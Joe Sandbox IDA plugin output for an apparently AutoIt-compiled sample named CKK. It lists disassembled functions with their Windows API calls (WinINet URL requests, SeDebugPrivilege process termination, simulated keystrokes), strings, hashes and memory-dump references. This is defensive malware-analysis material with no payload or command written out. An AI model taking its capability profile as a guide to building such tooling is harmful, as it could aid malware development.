Instruction ID: a2964a9fefce52e0c89d7ae55fb9b03553a8b1a37380d2aee98cb6d5aeace189
Opcode Fuzzy Hash: 5477ec94926cabe06b1ab53b906d3bf2551020f936e7de2d62207cc2c5d88d51
Instruction Fuzzy Hash: 5471BD31500209DFCF21CF64CD85ABA7BB5FF4A364F144269FE965A2A6C731A881DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A6359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00A635E4

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

LoadStringW.USER32(00AC2390,?,00000FFF,?), ref: 00A6360A

Strings

Line %d (File "%s"):, xrefs: 00A6366B
"%s" (%d) : ==> %s:%s%s, xrefs: 00A63724
^ ERROR, xrefs: 00A636C9
"%s" (%d) : ==> %s:, xrefs: 00A63742
Error: , xrefs: 00A636EF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: d8ae871546edb325395045f80a2c1f2f861ba4beb98ba7e4dfc00f33e3f26afd
Instruction ID: 07d37d326d4943c70bae5ae9dad33db107fb858cf4ea796165368efee813c892
Opcode Fuzzy Hash: d8ae871546edb325395045f80a2c1f2f861ba4beb98ba7e4dfc00f33e3f26afd
Instruction Fuzzy Hash: 56516A72900209BADF15EBA0DD42FEEBB78EF45344F044125F605761A2EB701A9ADFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A88B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2

Part of subcall function 00A0912D: GetCursorPos.USER32(?), ref: 00A09141
Part of subcall function 00A0912D: ScreenToClient.USER32(00000000,?), ref: 00A0915E
Part of subcall function 00A0912D: GetAsyncKeyState.USER32 ref: 00A09183
Part of subcall function 00A0912D: GetAsyncKeyState.USER32 ref: 00A0919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00A88B6B
ImageList_EndDrag.COMCTL32 ref: 00A88B71
ReleaseCapture.USER32 ref: 00A88B77
SetWindowTextW.USER32 ref: 00A88C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A88C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00A88CFF

Strings

@GUI_DROPID, xrefs: 00A88C51
@GUI_DRAGFILE, xrefs: 00A88C9A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: b81e9f6b7ed91ad4925029cf54b6d29a41ee1351d420b617d24034c4e4f31239
Instruction ID: b1ed077e89412d0e71257f7823e5df5348da805933c47cd7cb9f57c3492f083f
Opcode Fuzzy Hash: b81e9f6b7ed91ad4925029cf54b6d29a41ee1351d420b617d24034c4e4f31239
Instruction Fuzzy Hash: DF519CB0204304AFD704EF64DD96FAA77E4FB88754F400A2DF996972E2DB749904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A6C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A6C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A6C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A6C2CA
GetLastError.KERNEL32 ref: 00A6C322
SetEvent.KERNEL32(?), ref: 00A6C336
InternetCloseHandle.WININET(00000000), ref: 00A6C341

Strings

, xrefs: 00A6C2BB

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 85001e3545da5893f1f094671b8b646b976b9fec3b78492dab3110bb9aa96ffe
Instruction ID: 6333be53a9b28c7b0b9bb7e3c30e6031e3371c4e2af262dd64991ccacd80c7f4
Opcode Fuzzy Hash: 85001e3545da5893f1f094671b8b646b976b9fec3b78492dab3110bb9aa96ffe
Instruction Fuzzy Hash: 46316DB1600208AFD721EFA49988ABBBAFCEB49764B10851EF48697240DB34DD059B70

Uniqueness

Uniqueness Score: -1.00%

Function 00A5989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A33AAF,?,?,Bad directive syntax error,00A8CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A598BC
LoadStringW.USER32(00000000,?,00A33AAF,?), ref: 00A598C3

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

MessageBoxW.USER32 ref: 00A59987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00A598F1
Line %d (File "%s"):, xrefs: 00A5992D
., xrefs: 00A5996D
Error: , xrefs: 00A59955
Line %d:, xrefs: 00A59912

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 7cfec5d950c9473c3bbadaa47f885ffe481575724fa4924fa8182830dee1e558
Instruction ID: 420eab664b93c6b58b5dba35b63730c7569df603d67dec545fcc0687b0473682
Opcode Fuzzy Hash: 7cfec5d950c9473c3bbadaa47f885ffe481575724fa4924fa8182830dee1e558
Instruction Fuzzy Hash: 69214B3280021EFBCF16EF90CC06FEE7779BF18341F044869F619660A2EA759618DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A5209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00A520AB
GetClassNameW.USER32(00000000,?,00000100), ref: 00A520C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A5214D

Strings

SHELLDLL_DefView, xrefs: 00A520CC
list, xrefs: 00A5212F
smallicons, xrefs: 00A52115
details, xrefs: 00A520FB
largeicons, xrefs: 00A520E1

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 8db95134c3464875cf6279ff2d022b20e94b1f8f8abfc891a1cbb4621bc3d633
Instruction ID: 6b6501745b4561eb765b95c9015de99bde43fdb4f7a160be3ab1dc640cc903f4
Opcode Fuzzy Hash: 8db95134c3464875cf6279ff2d022b20e94b1f8f8abfc891a1cbb4621bc3d633
Instruction Fuzzy Hash: E711E776684B06B9F6056334DC06EE7379CFF1A365B200226FE04A50D2FA7158465B54

Uniqueness

Uniqueness Score: -1.00%

Function 00A2CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00A2CEB7
_free.LIBCMT ref: 00A2CF22
_free.LIBCMT ref: 00A2CF48
_free.LIBCMT ref: 00A2CF71
_free.LIBCMT ref: 00A2CFA9
_free.LIBCMT ref: 00A2CFDA
_free.LIBCMT ref: 00A2D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00A2D09C
_free.LIBCMT ref: 00A2D0B5

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 4c890f990deb854d1322e571dfc1aef65392108d8ca7b4132d33e30383f45bf8
Instruction ID: 373ab02d275235e8d4c2844b0e193493342e925d4b19074a8e30a7b7fcf99091
Opcode Fuzzy Hash: 4c890f990deb854d1322e571dfc1aef65392108d8ca7b4132d33e30383f45bf8
Instruction Fuzzy Hash: 70612571A04360AFDB21AFBCBE81F6E7BA5AF05320F15427DF94697282E6319D418790

Uniqueness

Uniqueness Score: -1.00%

Function 00A850D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A85186
ShowWindow.USER32(?,00000000), ref: 00A851C7
ShowWindow.USER32(?,00000005), ref: 00A851CD
SetFocus.USER32 ref: 00A851D1

Part of subcall function 00A86FBA: DeleteObject.GDI32(00000000), ref: 00A86FE6

GetWindowLongW.USER32(?,000000F0), ref: 00A8520D
SetWindowLongW.USER32 ref: 00A8521A
InvalidateRect.USER32(?,00000000,00000001), ref: 00A8524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A85287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A85296

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 842fe4d40f2a687816dc03e392111dfbfc81c80262e44ac6e2baa12898339b92
Instruction ID: c8bd69804b46a7ef6c9bfc55d99aa690911ba4a3212d56c8609b22dd9ddcf88f
Opcode Fuzzy Hash: 842fe4d40f2a687816dc03e392111dfbfc81c80262e44ac6e2baa12898339b92
Instruction Fuzzy Hash: B8519D30E50A08FEEF20BF74CC4ABD93B65BB05321F144211FE15962E1EB75A990DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A08B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 00A46890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A468A9
LoadImageW.USER32 ref: 00A468B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A468D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A468F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A08874,00000000,00000000,00000000,000000FF,00000000), ref: 00A46901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A4691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A08874,00000000,00000000,00000000,000000FF,00000000), ref: 00A4692D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 0068ab4aac43c175d37fac0cc4d617953cc8c831d88b84f11cd8a53f7e720acd
Instruction ID: 4692fc5964f29cccde16d2791db90876c10be8e76417ab5ad5e6ba74966558e8
Opcode Fuzzy Hash: 0068ab4aac43c175d37fac0cc4d617953cc8c831d88b84f11cd8a53f7e720acd
Instruction Fuzzy Hash: 9A518774600209EFDB20CF64DC95FAA7BB5FB8A760F104528F982972E0DB74E991DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A6C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A6C182
GetLastError.KERNEL32 ref: 00A6C195
SetEvent.KERNEL32(?), ref: 00A6C1A9

Part of subcall function 00A6C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A6C272
Part of subcall function 00A6C253: GetLastError.KERNEL32 ref: 00A6C322
Part of subcall function 00A6C253: SetEvent.KERNEL32(?), ref: 00A6C336
Part of subcall function 00A6C253: InternetCloseHandle.WININET(00000000), ref: 00A6C341

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: d1a5b67fceac2ef3fbe72f3a00f523a288c4685a14f56c0f2489c6f6bb7c0760
Instruction ID: 3a103a9f75f9f722bbfe16b010903361d4c0bf0e2a0d43954026f6078975f4ec
Opcode Fuzzy Hash: d1a5b67fceac2ef3fbe72f3a00f523a288c4685a14f56c0f2489c6f6bb7c0760
Instruction Fuzzy Hash: 05317871200705AFDB21AFF5DD54AB6BBF8FF18320B00852EF99A86611D731E8159FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A525A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A53A57
Part of subcall function 00A53A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00A525B3), ref: 00A53A5E
Part of subcall function 00A53A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00A53A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 00A525BD
PostMessageW.USER32 ref: 00A525DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00A525DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 00A525E9
PostMessageW.USER32 ref: 00A52601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00A52605
MapVirtualKeyW.USER32(00000025,00000000), ref: 00A5260F
PostMessageW.USER32 ref: 00A52623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00A52627

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 1cfe3cc9a76a43786ebe07b4b92d5e3e5b44a389a0c6027398439f56bea3b29c
Instruction ID: 04612b3dc6e01b4db36258213c8b57d44cc06b6472eca422d81a273923e39994
Opcode Fuzzy Hash: 1cfe3cc9a76a43786ebe07b4b92d5e3e5b44a389a0c6027398439f56bea3b29c
Instruction Fuzzy Hash: B701B531290220BBFB10A7A89C8EF593F59EB4AB62F100011F714AE0D5C9F214498F79

Uniqueness

Uniqueness Score: -1.00%

Function 00A51803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00A51449,?,?,00000000), ref: 00A5180C
HeapAlloc.KERNEL32(00000000,?,00A51449,?,?,00000000), ref: 00A51813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A51449,?,?,00000000), ref: 00A51828
GetCurrentProcess.KERNEL32(?,00000000,?,00A51449,?,?,00000000), ref: 00A51830
DuplicateHandle.KERNEL32 ref: 00A51833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A51449,?,?,00000000), ref: 00A51843
GetCurrentProcess.KERNEL32(00A51449,00000000,?,00A51449,?,?,00000000), ref: 00A5184B
DuplicateHandle.KERNEL32 ref: 00A5184E
CreateThread.KERNEL32(00000000,00000000,00A51874,00000000,00000000,00000000), ref: 00A51868

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: af03a568292ad303fe78e401b85628f887806367c03920611d701264114aedec
Instruction ID: 8a476b135bcb864d10ea6e3ba0e00127c4b2c513f93ba439ea96e7635e1115e6
Opcode Fuzzy Hash: af03a568292ad303fe78e401b85628f887806367c03920611d701264114aedec
Instruction Fuzzy Hash: 7101A8B5240308BFE610EBA5DC8DF6B7BACEB89B11F004511FA05DB2A1DA7198018F30

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00A5D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00A5D501
Part of subcall function 00A5D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00A5D50F
Part of subcall function 00A5D4DC: CloseHandle.KERNEL32(00000000), ref: 00A5D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A7A16D
GetLastError.KERNEL32 ref: 00A7A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A7A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00A7A268
GetLastError.KERNEL32(00000000), ref: 00A7A273
CloseHandle.KERNEL32(00000000), ref: 00A7A2C4

Strings

SeDebugPrivilege, xrefs: 00A7A18F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: a7bd61c66fa04e6061b6a250ff2d973503172a65afbf9b51305469b092469b9c
Instruction ID: a109e115bd8b8734d9f6466bed9daad8fa226294436b54139fb7fc837fc2a9c3
Opcode Fuzzy Hash: a7bd61c66fa04e6061b6a250ff2d973503172a65afbf9b51305469b092469b9c
Instruction Fuzzy Hash: 26619171204242AFD710DF14C894F69BBE1AF94318F54C49CE45A4B7A3C776ED46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A83886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A83925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A8393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A83954
_wcslen.LIBCMT ref: 00A83999
SendMessageW.USER32(?,00001057,00000000,?), ref: 00A839C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A839F4

Strings

SysListView32, xrefs: 00A838F7

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: c6fc024d7137658fca27086c59422ea2ecb504ad2156b14a835c2ae17fcbf062
Instruction ID: b81b6affa4bbdefbcf992cc9b260c60465b9dc063b2d3126a22a77129912fd78
Opcode Fuzzy Hash: c6fc024d7137658fca27086c59422ea2ecb504ad2156b14a835c2ae17fcbf062
Instruction Fuzzy Hash: 54419372A00219ABEF21EF64CC45FEE7BA9FF48750F100526F958E7281D7759A84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A5C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 00A5C913

Strings

warning, xrefs: 00A5C8FC
info, xrefs: 00A5C8B4
blank, xrefs: 00A5C895
stop, xrefs: 00A5C8E4
question, xrefs: 00A5C8CC

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 0d68fcb729c682df3646f67b15fc331918b2471761d4b1dbb366980842b06d7e
Instruction ID: fb29a08e5bdc26a79feb4254380259477cd12c9a3f2df60b137f40a6daea7504
Opcode Fuzzy Hash: 0d68fcb729c682df3646f67b15fc331918b2471761d4b1dbb366980842b06d7e
Instruction Fuzzy Hash: EF110D32689306FEE7019B549C83DEA67ACFF15776B60042AFD00A62C3DB745D845264

Uniqueness

Uniqueness Score: -1.00%

Function 00A5ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00A5ED2A
_wcslen.LIBCMT ref: 00A5ED3B
_wcslen.LIBCMT ref: 00A5ED79
_wcslen.LIBCMT ref: 00A5EDAF
_wcslen.LIBCMT ref: 00A5EDDF
_wcslen.LIBCMT ref: 00A5EDEF
_wcslen.LIBCMT ref: 00A5EE2B
_wcslen.LIBCMT ref: 00A5EE5A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
